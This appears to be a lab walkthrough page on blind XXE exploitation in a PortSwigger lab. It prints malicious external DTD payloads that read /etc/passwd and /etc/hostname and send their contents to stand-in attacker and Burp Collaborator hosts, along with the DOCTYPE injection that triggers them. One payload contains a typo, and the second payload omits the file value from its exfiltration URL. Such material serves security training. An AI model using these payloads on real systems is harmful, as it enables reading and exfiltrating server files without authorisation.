Exploitation

What we did so far was just to ping back our Burp Collab from the remote host, but it actually doesn't tell us how to go on and exploit this vulnerability.

  • Every attacker wants to retrieve any sort of interesting information, this can be achieved using this Blind XXE

  • But this attack is only possible, when the attacker hosts a malicious DTD on a system that they control

And then invoking the external DTD from within the in-band XXE payload.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENITTY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://ATTACKER IP/?x=%file;'>">
%eval;
%exfiltrate;

  1. It defines an XML parameter entity called file, which contains /etc/passwd

  2. It again defines another XML parameter called eval, containing a dynamic declaration of another entity called exfiltrate

  3. The exfiltrate entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the file entity within the URL query string

  4. It uses the eval entity, which invokes the exfiltrate entity to be performed

  5. It uses the exfiltrate entity, so that its value is evaluated by requesting the specified URL

The attacker must then host the malicious DTD on a system that they control, normally by loading it onto their own webserver

http://BURP-COLLABORATOR/malicious.dtd

Finally the attacker must modify the request to be something like this,

<!DOCTYPE d0p [ <!ENTITY % xxe SYSTEM "http://ATTACKER IP/malicious.dtd"> %xxe; ]>

So we just managed to exfiltrate the hostname using a malicious external DTD

When we try to ping back our Burp collab the usual way, it doesn't work so we'll have to try another way to get it

Luckily, PortSwigger labs provide us with an exploit server where we can craft and store our own payload

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLAB/exploit.dtd'>">
%eval;
%exfil;

When we store this payload, notice the URL -> It gives us our malicious DTD

Now we can exploit it the normal way,

<!DOCTYPE stockCheck [ <!ENTITY % xxe SYSTEM "https://THE-MALICIOUS-DTD-URL/exploit.dtd"> %xxe; ]>

And now when we Poll Back, we notice there is a DNS and an HTTP Response Checking out the HTTP request gives us a GET method containing the hostname

GET /?x=<HOSTNAME>

Note

/etc/passwd doesn't work because of the newline characters in the file, Some XML parsers fetch the URL in the external entity definition using an API that validates the characters that are allowed to appear within the URL.

  • It is best to use FTP:// instead of HTTP://

That's why we use files like /etc/hostname

PreviousIdentificationNextBlind XXE to LFI

Last updated